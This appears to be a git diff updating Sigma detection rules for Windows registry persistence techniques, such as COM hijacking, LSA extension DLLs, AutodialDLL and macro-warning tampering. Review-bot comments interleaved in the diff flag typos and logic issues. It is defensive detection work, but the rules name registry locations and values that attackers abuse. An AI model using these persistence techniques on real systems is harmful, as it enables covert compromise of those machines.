 - Internal Research
diff --git a/sigma/builtin/registry/registry_set/registry_set_office_trusted_location_uncommon.yml b/sigma/builtin/registry/registry_set/registry_set_office_trusted_location_uncommon.yml
index 25dcc98e6..1507c5b5c 100644
--- a/sigma/builtin/registry/registry_set/registry_set_office_trusted_location_uncommon.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_office_trusted_location_uncommon.yml
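Review bot: The comment added to the related entry of "Outlook Security Settings Updated - Registry", `# EnableUnsafeClientMailRules`, does not match the id it annotates: within this same diff `a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd` is the id of "Macro Enabled In A Potentially Suspicious Document", while the EnableUnsafeClientMailRules registry rule carries id `6763c6c8-bd01-4687-bc8d-4fa52cf8ba08`. Either the comment should name the rule the id actually points to, `# Macro Enabled In A Potentially Suspicious Document`, or the related entry was meant to reference `6763c6c8-bd01-4687-bc8d-4fa52cf8ba08` and the id itself needs correcting; I cannot tell which from the diff alone. A mislabelled cross-reference sends an analyst to the wrong sibling rule when they pivot during triage, so it is worth settling before merge.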
@@ -1,12 +1,10 @@
 title: Uncommon Microsoft Office Trusted Location Added
 id: f742bde7-9528-42e5-bd82-84f51a8387d2
 related:
- - id: a0bed973-45fa-4625-adb5-6ecdf9be70ac
- type: derived
+ - id: a0bed973-45fa-4625-adb5-6ecdf9be70ac
+ type: derived
 status: experimental
-description: Detects changes to registry keys related to "Trusted Location" of Microsoft
- Office where the path is set to something uncommon. Attackers might add additional
- trusted locations to avoid macro security restrictions.
+description: Detects changes to registry keys related to "Trusted Location" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions.
 references:
 - Internal Research
 - https://admx.help/?Category=Office2016&Policy=excel16.Office.Microsoft.Policies.Windows::L_TrustedLoc01
@@ -43,10 +41,8 @@ detection:
 ProcessName|contains:
 - :\Program Files\Microsoft Office\
 - :\Program Files (x86)\Microsoft Office\
- condition: registry_set and (selection and not 1 of filter_main_* and not 1 of
- filter_exclude_*)
+ condition: registry_set and (selection and not 1 of filter_main_* and not 1 of filter_exclude_*)
 falsepositives:
- - Other unknown legitimate or custom paths need to be filtered to avoid false
- positives
+ - Other unknown legitimate or custom paths need to be filtered to avoid false positives
 level: high
 ruletype: Sigma
diff --git a/sigma/builtin/registry/registry_set/registry_set_office_vba_warnings_tamper.yml b/sigma/builtin/registry/registry_set/registry_set_office_vba_warnings_tamper.yml
index c7bf152ea..91cede558 100644
--- a/sigma/builtin/registry/registry_set/registry_set_office_vba_warnings_tamper.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_office_vba_warnings_tamper.yml
@@ -1,11 +1,10 @@
 title: Office Macros Auto-Enabled
 id: 91239011-fe3c-4b54-9f24-15c86bb65913
 related:
- - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd
- type: obsoletes
+ - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd
+ type: obsoletes
 status: test
-description: Detects registry changes to Microsoft Office "VBAWarning" to a value
- of "1" which enables the execution of all macros, whether signed or unsigned.
+description: Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned.
 references:
 - https://twitter.com/inversecos/status/1494174785621819397
 - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/
diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_app_cpmpat_layer_registerapprestart.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_app_cpmpat_layer_registerapprestart.yml
index aee54139c..a55c470ab 100644
--- a/sigma/builtin/registry/registry_set/registry_set_persistence_app_cpmpat_layer_registerapprestart.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_persistence_app_cpmpat_layer_registerapprestart.yml
@@ -1,15 +1,10 @@ title: Potential Persistence Via AppCompat RegisterAppRestart Layer id: b86852fb-4c77-48f9-8519-eb1b2c308b59 status: experimental -description: 'Detects the setting of the REGISTERAPPRESTART compatibility layer on - an application. - - This compatibility layer allows an application to register for restart using the - "RegisterApplicationRestart" API. - +description: | + Detects the setting of the REGISTERAPPRESTART compatibility layer on an application. + This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API. This can be potentially abused as a persistence mechanism. - - ' references: - https://github.com/nasbench/Misc-Research/blob/d114d6a5e0a437d3818e492ef9864367152543e7/Other/Persistence-Via-RegisterAppRestart-Shim.md author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_app_paths.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_app_paths.yml index 21700a0fd..bdd30cbcc 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_app_paths.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_app_paths.yml 
@@ -1,18 +1,11 @@ title: Potential Persistence Via App Paths Default Property id: 707e097c-e20f-4f67-8807-1f72ff4500d6 status: experimental -description: 'Detects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App - Paths\ registry. Which might be used as a method of persistence - +description: | + Detects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry. Which might be used as a method of persistence The entries found under App Paths are used primarily for the following purposes. - - First, to map an application''s executable file name to that file''s fully qualified - path. - - Second, to prepend information to the PATH environment variable on a per-application, - per-process basis. - - ' + First, to map an application's executable file name to that file's fully qualified path. + Second, to prepend information to the PATH environment variable on a per-application, per-process basis. references: - https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/ - https://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN @@ -35,6 +28,7 @@ detection: - (Default) - Path NewValue|contains: + # Add more suspicious paths or binaries as you see fit. - \Users\Public - \AppData\Local\Temp\ - \Windows\Temp\ @@ -55,7 +49,6 @@ detection: - .ps1 condition: registry_set and selection falsepositives: - - Legitimate applications registering their binary from on of the suspicious locations - mentioned above (tune it) + - Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it) level: high ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_autodial_dll.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_autodial_dll.yml index d065549bc..951fde7c6 100644 
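Review bot: The reflowed falsepositives entry in the last hunk of this file keeps the typo "from on of the suspicious locations"; since the line is rewritten anyway, make it `- Legitimate applications registering their binary from one of the suspicious locations mentioned above (tune it)`. In the first hunk the new literal-block description still contains the sentence fragment "Which might be used as a method of persistence", which reads better joined to the preceding sentence with a comma and a terminating period.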
--- a/sigma/builtin/registry/registry_set/registry_set_persistence_autodial_dll.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_autodial_dll.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via AutodialDLL id: e6fe26ee-d063-4f5b-b007-39e90aaf50e3 status: experimental -description: Detects change the the "AutodialDLL" key which could be used as a persistence - method to load custom DLL via the "ws2_32" library +description: Detects change the the "AutodialDLL" key which could be used as a persistence method to load custom DLL via the "ws2_32" library references: - https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/ - https://persistence-info.github.io/Data/autodialdll.html diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_chm.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_chm.yml index c143a18e1..9991fc86f 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_chm.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_chm.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via CHM Helper DLL id: 976dd1f2-a484-45ec-aa1d-0e87e882262b status: experimental -description: Detects when an attacker modifies the registry key "HtmlHelp Author" - to achieve persistence +description: Detects when an attacker modifies the registry key "HtmlHelp Author" to achieve persistence references: - https://persistence-info.github.io/Data/htmlhelpauthor.html - https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/ diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml index 4958fa026..4448ee8c8 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml 
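Review bot: The single-line description in the AutodialDLL hunk carries over "Detects change the the "AutodialDLL" key", which is a typo in the text now being rewritten. Suggested wording: `description: Detects changes to the "AutodialDLL" key which could be used as a persistence method to load a custom DLL via the "ws2_32" library`.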
@@ -1,11 +1,9 @@ title: Potential Persistence Via COM Hijacking From Suspicious Locations id: 3d968d17-ffa4-4bc0-bfdc-f139de76ce77 status: experimental -description: Detects potential COM object hijacking where the "Server" (In/Out) is - pointing to a suspicious or unsuale location +description: Detects potential COM object hijacking where the "Server" (In/Out) is pointing to a suspicious or unsuale location references: - - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ - (idea) + - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea) author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/28 modified: 2023/09/28 @@ -24,12 +22,12 @@ detection: ObjectName|endswith: - \InprocServer32\(Default) - \LocalServer32\(Default) - NewValue|contains: + NewValue|contains: # Add more suspicious paths and locations - \AppData\Local\Temp\ - \Desktop\ - \Downloads\ - \Microsoft\Windows\Start Menu\Programs\Startup\ - - \System32\spool\drivers\color\ + - \System32\spool\drivers\color\ # as seen in the knotweed blog - \Users\Public\ - \Windows\Temp\ - '%appdata%' @@ -37,7 +35,6 @@ detection: - '%tmp%' condition: registry_set and selection falsepositives: - - Probable legitimate applications. If you find these please add them to an exclusion - list + - Probable legitimate applications. If you find these please add them to an exclusion list level: high ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_comhijack_psfactorybuffer.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_comhijack_psfactorybuffer.yml index 46f6b1f58..88fc8c308 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_comhijack_psfactorybuffer.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_comhijack_psfactorybuffer.yml 
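Review bot: The rewritten description in the first hunk keeps the misspelling "unsuale"; suggest `description: Detects potential COM object hijacking where the "Server" (In/Out) is pointing to a suspicious or unusual location`. The reference entry on the next line now ends with "(idea)" appended after the URL, which tooling that validates reference URLs may reject; if that remark is worth keeping, a trailing YAML comment (`# idea`) keeps the URL clean.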
@@ -1,8 +1,7 @@ title: Potential PSFactoryBuffer COM Hijacking id: 243380fa-11eb-4141-af92-e14925e77c1b status: experimental -description: Detects changes to the PSFactory COM InProcServer32 registry. This technique - was used by RomCom to create persistence storing a malicious DLL. +description: Detects changes to the PSFactory COM InProcServer32 registry. This technique was used by RomCom to create persistence storing a malicious DLL. references: - https://blogs.blackberry.com/en/2023/06/romcom-resurfaces-targeting-ukraine - https://strontic.github.io/xcyclopedia/library/clsid_C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6.html diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml index 8e7b6608e..c44cc174a 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml @@ -1,10 +1,7 @@ title: Potential Persistence Via Custom Protocol Handler id: fdbf0b9d-0182-4c43-893b-a1eaab92d085 status: experimental -description: Detects potential persistence activity via the registering of a new custom - protocole handlers. While legitimate applications register protocole handlers - often times during installation. And attacker can abuse this by setting a custom - handler to be used as a persistence mechanism. +description: Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism. references: - https://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/ author: Nasreddine Bencherchali (Nextron Systems) 
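Review bot: The description in the custom protocol handler hunk repeats "protocole" twice and starts a sentence with "And attacker", which the reflow preserved verbatim. Suggested wording: `description: Detects potential persistence activity via the registering of a new custom protocol handler. While legitimate applications often register protocol handlers during installation, an attacker can abuse this by setting a custom handler to be used as a persistence mechanism.`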
@@ -26,14 +23,16 @@ detection: filter_main_ms_trusted: NewValue|startswith: URL:ms- filter_main_generic_locations: - ProcessName|startswith: + ProcessName|startswith: # Add more folders to avoid FP - C:\Program Files (x86) - C:\Program Files\ - C:\Windows\System32\ - C:\Windows\SysWOW64\ + # Uncomment This section to add specific Protocol Handler names that are know + # filter_specific: + # Details: 'URL:' condition: registry_set and (selection and not 1 of filter_main_*) falsepositives: - - Many legitimate applications can register a new custom protocol handler. Additional - filters needs to applied according to your environment. + - Many legitimate applications can register a new custom protocol handler. Additional filters needs to applied according to your environment. level: medium ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml index d99170eb3..04fba412d 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via Event Viewer Events.asp id: a1e11042-a74a-46e6-b07c-c4ce8ecc239b status: test -description: Detects potential registry persistence technique using the Event Viewer - "Events.asp" technique +description: Detects potential registry persistence technique using the Event Viewer "Events.asp" technique references: - https://twitter.com/nas_bench/status/1626648985824788480 - https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.InternetCommunicationManagement::EventViewer_DisableLinks 
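Review bot: The commented-out `filter_specific` template added in this hunk uses the field name `Details`, but this converted rule matches on `NewValue` (see `filter_main_ms_trusted: NewValue|startswith: URL:ms-` in the same hunk), so anyone uncommenting it as written would get a filter that never evaluates the field the rule actually uses. Change the template to `#   NewValue|startswith: 'URL:'` (with whatever modifier the intended handler names require) and fix "that are know" to "that are known" in the comment above it. Separately, the `C:\Program Files (x86)` entry in `filter_main_generic_locations` lacks the trailing backslash its siblings have, so that prefix match is slightly looser than the others.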
@@ -23,6 +22,8 @@ detection: EventID: 4657 Channel: Security selection: + # Covers both "\Policies\" and "\Software\" paths for both "Machine" and "User" level configs + # Also "MicrosoftRedirectionProgramCommandLineParameters" key ObjectName|contains: - \Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionProgram - \Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionURL diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_globalflags.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_globalflags.yml index 822f33a7c..5acadb988 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_globalflags.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_globalflags.yml @@ -1,11 +1,10 @@ title: Potential Persistence Via GlobalFlags id: 36803969-5421-41ec-b92f-8500f79c23b0 related: - - id: c81fe886-cac0-4913-a511-2822d72ff505 - type: obsoletes + - id: c81fe886-cac0-4913-a511-2822d72ff505 + type: obsoletes status: test -description: Detects registry persistence technique using the GlobalFlags and SilentProcessExit - keys +description: Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys references: - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/ diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_ie.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_ie.yml index 90a3034c8..8a6d5c049 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_ie.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_ie.yml 
@@ -1,10 +1,7 @@ title: Modification of IE Registry Settings id: d88d0ab2-e696-4d40-a2ed-9790064e66b3 status: experimental -description: Detects modification of the registry settings used for Internet Explorer - and other Windows components that use these settings. An attacker can abuse this - registry key to add a domain to the trusted sites Zone or insert javascript for - persistence +description: Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert javascript for persistence references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry @@ -38,6 +35,7 @@ detection: filter_binary: NewValue: Binary Data filter_accepted_documents: + # Spotted during office installations ObjectName|contains: \Accepted Documents\ condition: registry_set and (selection_domains and not 1 of filter_*) falsepositives: diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_ifilter.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_ifilter.yml index f56214670..4422e678a 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_ifilter.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_ifilter.yml 
@@ -1,11 +1,7 @@ title: Register New IFiltre For Persistence id: b23818c7-e575-4d13-8012-332075ec0a2b status: experimental -description: Detects when an attacker register a new IFilter for an extension. Microsoft - Windows Search uses filters to extract the content of items for inclusion in a - full-text index. You can extend Windows Search to index new or proprietary file - types by writing filters to extract the content, and property handlers to extract - the properties of files +description: Detects when an attacker register a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files references: - https://persistence-info.github.io/Data/ifilters.html - https://twitter.com/0gtweet/status/1468548924600459267 @@ -65,6 +61,7 @@ detection: - \CLSID\{FB10BD80-A331-4e9e-9EB7-00279903AD99}\ filter_generic_paths: ProcessName|startswith: + # We assume if an attacker has access to one of these directories. Then he already has admin. - C:\Windows\System32\ - C:\Program Files (x86)\ - C:\Program Files\ diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_lsa_extension.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_lsa_extension.yml index 0c9f716f1..458c5f195 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_lsa_extension.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_lsa_extension.yml 
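Review bot: The first hunk's title still reads "Register New IFiltre For Persistence" and the reflowed description says "when an attacker register a new IFilter"; since the description line is rewritten here, suggest `title: Register New IFilter For Persistence` and `description: Detects when an attacker registers a new IFilter for an extension. ...` with the rest of the sentence unchanged.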
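Review bot: The `filter_generic_paths` entries in the second hunk hard-code the `C:` drive (`C:\Windows\System32\`, `C:\Program Files (x86)\`, `C:\Program Files\`), while other rules in this same update use drive-agnostic forms such as `ProcessName|contains: - :\Program Files\Microsoft Office\`; on a host with a different system drive these processes would not be filtered and the rule would fire on the very installers the filter is meant to exclude. Consider `ProcessName|contains:` with `:\Windows\System32\`, `:\Program Files (x86)\` and `:\Program Files\` for consistency. The added comment ("then he already has admin") would read better as an explicit statement that the filter is a false-positive trade-off rather than a security boundary, e.g. `# FP trade-off: writes from these directories already imply elevated access, so they are excluded`.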
@@ -1,13 +1,9 @@ title: Potential Persistence Via LSA Extensions id: 41f6531d-af6e-4c6e-918f-b946f2b85a36 status: experimental -description: 'Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" - to include a custom DLL to achieve persistence via lsass. - - The "Extensions" list contains filenames of DLLs being automatically loaded by - lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading. - - ' +description: | + Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" to include a custom DLL to achieve persistence via lsass. + The "Extensions" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading. references: - https://persistence-info.github.io/Data/lsaaextension.html - https://twitter.com/0gtweet/status/1476286368385019906 diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_mpnotify.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_mpnotify.yml index 31f06db85..945ff4ee7 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_mpnotify.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_mpnotify.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via Mpnotify id: 92772523-d9c1-4c93-9547-b0ca500baba3 status: experimental -description: Detects when an attacker register a new SIP provider for persistence - and defense evasion +description: Detects when an attacker register a new SIP provider for persistence and defense evasion references: - https://persistence-info.github.io/Data/mpnotify.html - https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek 
@@ -22,7 +21,6 @@ detection: ObjectName|contains: \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\mpnotify condition: registry_set and selection falsepositives: - - Might trigger if a legitimate new SIP provider is registered. But this is not - a common occurrence in an environment and should be investigated either way + - Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way level: high ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_mycomputer.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_mycomputer.yml index 497941ebe..ce9f20b95 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_mycomputer.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_mycomputer.yml @@ -1,9 +1,7 @@ title: Potential Persistence Via MyComputer Registry Keys id: 8fbe98a8-8f9d-44f8-aa71-8c572e29ef06 status: experimental -description: Detects modification to the "Default" value of the "MyComputer" key and - subkeys to point to a custom binary that will be launched whenever the associated - action is executed (see reference section for example) +description: Detects modification to the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example) references: - https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/ author: Nasreddine Bencherchali (Nextron Systems) @@ -23,7 +21,6 @@ detection: ObjectName|endswith: (Default) condition: registry_set and selection falsepositives: - - Unlikely but if you experience FPs add specific processes and locations you - would like to monitor for + - Unlikely but if you experience FPs add specific processes and locations you would like to monitor for level: high ruletype: Sigma 
diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_natural_language.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_natural_language.yml index 4ea76302e..8b24278ca 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_natural_language.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_natural_language.yml @@ -1,9 +1,7 @@ title: Potential Persistence Via DLLPathOverride id: a1b1fd53-9c4a-444c-bae0-34a330fc7aa8 status: experimental -description: Detects when an attacker adds a new "DLLPathOverride" value to the "Natural - Language" key in order to achieve persistence which will get invoked by "SearchIndexer.exe" - process +description: Detects when an attacker adds a new "DLLPathOverride" value to the "Natural Language" key in order to achieve persistence which will get invoked by "SearchIndexer.exe" process references: - https://persistence-info.github.io/Data/naturallanguage6.html - https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/ @@ -20,6 +18,10 @@ detection: EventID: 4657 Channel: Security selection_root: + # The path can be for multiple languages + # Example: HKLM\System\CurrentControlSet\Control\ContentIndex\Language\English_UK + # HKLM\System\CurrentControlSet\Control\ContentIndex\Language\English_US + # HKLM\System\CurrentControlSet\Control\ContentIndex\Language\Neutral ObjectName|contains: \SYSTEM\CurrentControlSet\Control\ContentIndex\Language\ selection_values: ObjectName|contains: diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_office_vsto.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_office_vsto.yml index e8fec8a09..e1c928058 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_office_vsto.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_office_vsto.yml 
@@ -1,8 +1,7 @@ title: Potential Persistence Via Visual Studio Tools for Office id: 9d15044a-7cfe-4d23-8085-6ebc11df7685 status: experimental -description: Detects persistence via Visual Studio Tools for Office (VSTO) add-ins - in Office applications. +description: Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications. references: - https://twitter.com/_vivami/status/1347925307643355138 - https://vanmieghem.io/stealth-outlook-persistence/ @@ -29,7 +28,8 @@ detection: filter_image: ProcessName|endswith: - \msiexec.exe - - \regsvr32.exe + - \regsvr32.exe # e.g. default Evernote installation + # triggered by a default Office 2019 installation filter_office: ProcessName|endswith: - \excel.exe diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_outlook_todaypage.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_outlook_todaypage.yml index 97e5341b7..fcc3b2618 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_outlook_todaypage.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_outlook_todaypage.yml @@ -1,9 +1,7 @@ title: Potential Persistence Via Outlook Today Pages id: 487bb375-12ef-41f6-baae-c6a1572b4dd1 status: experimental -description: Detects potential persistence activity via outlook today pages. An attacker - can set a custom page to execute arbitrary code and link to it via the registry - key "UserDefinedUrl". +description: Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key "UserDefinedUrl". references: - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=74 author: Tobias Michalski (Nextron Systems) 
@@ -33,8 +31,7 @@ detection: - C:\Program Files\Common Files\Microsoft Shared\ClickToRun\ - C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\ ProcessName|endswith: \OfficeClickToRun.exe - condition: registry_set and (selection_main and 1 of selection_value_* and not - 1 of filter_*) + condition: registry_set and (selection_main and 1 of selection_value_* and not 1 of filter_*) fields: - NewValue falsepositives: diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_reflectdebugger.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_reflectdebugger.yml index 73fc8bcd4..bd5c37e88 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_reflectdebugger.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_reflectdebugger.yml @@ -1,11 +1,10 @@ title: Potential WerFault ReflectDebugger Registry Value Abuse id: 0cf2e1c6-8d10-4273-8059-738778f981ad related: - - id: fabfb3a7-3ce1-4445-9c7c-3c27f1051cdd - type: derived + - id: fabfb3a7-3ce1-4445-9c7c-3c27f1051cdd + type: derived status: experimental -description: Detects potential WerFault "ReflectDebugger" registry value abuse for - persistence. +description: Detects potential WerFault "ReflectDebugger" registry value abuse for persistence. references: - https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html - https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/ @@ -22,7 +21,7 @@ detection: EventID: 4657 Channel: Security selection: - OperationType: '%%1905' + OperationType: '%%1905' ObjectName|endswith: \Microsoft\Windows\Windows Error Reporting\Hangs\ReflectDebugger condition: registry_set and selection falsepositives: diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_scrobj_dll.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_scrobj_dll.yml index 5a228f5ae..46cdca74b 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_scrobj_dll.yml 
+++ b/sigma/builtin/registry/registry_set/registry_set_persistence_scrobj_dll.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via Scrobj.dll COM Hijacking id: fe20dda1-6f37-4379-bbe0-a98d400cae90 status: experimental -description: Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to - get the location of the script to execute +description: Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md author: frack113 diff --git a/sigma/builtin/registry/registry_set/registry_set_persistence_search_order.yml b/sigma/builtin/registry/registry_set/registry_set_persistence_search_order.yml index dab6c194b..a1ffacb1a 100644 --- a/sigma/builtin/registry/registry_set/registry_set_persistence_search_order.yml +++ b/sigma/builtin/registry/registry_set/registry_set_persistence_search_order.yml @@ -4,7 +4,7 @@ status: experimental description: Detects potential COM object hijacking leveraging the COM Search Order references: - https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/ -author: "Maxime Thiebaut (@0xThiebaut), oscd.community, C\xE9dric Hien" +author: Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien date: 2020/04/14 modified: 2023/09/28 tags: @@ -17,15 +17,16 @@ detection: registry_set: EventID: 4657 Channel: Security - selection: + selection: # Detect new COM servers in the user hive ObjectName|contains: \CLSID\ ObjectName|endswith: \InprocServer32\(Default) filter_main_generic: - NewValue|contains: + NewValue|contains: # Exclude privileged directories and observed FPs - '%%systemroot%%\system32\' - '%%systemroot%%\SysWow64\' filter_main_onedrive: NewValue|contains: + # Related To OneDrive - \AppData\Local\Microsoft\OneDrive\ - \FileCoAuthLib64.dll - \FileSyncShell64.dll 
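Review bot: The new inline comment `selection: # Detect new COM servers in the user hive` is not reflected by the visible selection, which only requires `ObjectName|contains: \CLSID\` and `ObjectName|endswith: \InprocServer32\(Default)` and therefore matches machine-hive writes as well, unless a hive constraint exists outside this hunk. Either add a user-hive path constraint if that scope is intended, or reword the comment to `# Detect new COM InprocServer32 registrations (any hive)` so it does not promise a scope the logic does not enforce. The enclosing `detection` block continues past the end of the hunk.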
